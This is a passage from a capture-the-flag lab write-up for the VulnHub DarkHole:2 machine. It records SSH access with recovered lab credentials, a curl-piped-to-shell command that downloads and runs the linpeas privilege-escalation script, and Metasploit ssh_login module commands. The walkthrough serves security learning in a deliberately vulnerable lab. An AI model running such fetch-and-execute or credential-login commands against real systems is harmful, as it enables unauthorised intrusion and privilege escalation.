ameyer2002/Kali-Linux-CTF-VulnHub/DarkHole:2.md

 During the scan, the injections are successful and return two tables, a user table and a ssh table.
 This worked so I can now ssh into jehad's account.
 I run the command **ssh jehad@192.168.19.129**, input the password **fool** and I'm in the account.

+Now that I have access to an account, it's time for privilege escalation.
+I switched to the tmp folder and tried to run the Linpeas script: **curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh**.
+This is a script that searches for potential paths to elevate privileges on Linux hosts and highlights them for a better understanding of those instances with potential exploits.
+This is my first time using this which was really insightful and I will definitely be using this again in other labs.
+However, I decided to use metasploit.
+I used the’s SSH auxiliary module:

+* msfconsole
+* search ssh type:auxiliary
+* use auxiliary/scanner/ssh/ssh_login
+* set USERNAME jehad
+* set PASSWORD fool
+* set RHOSTS 192.168.19.129
+* run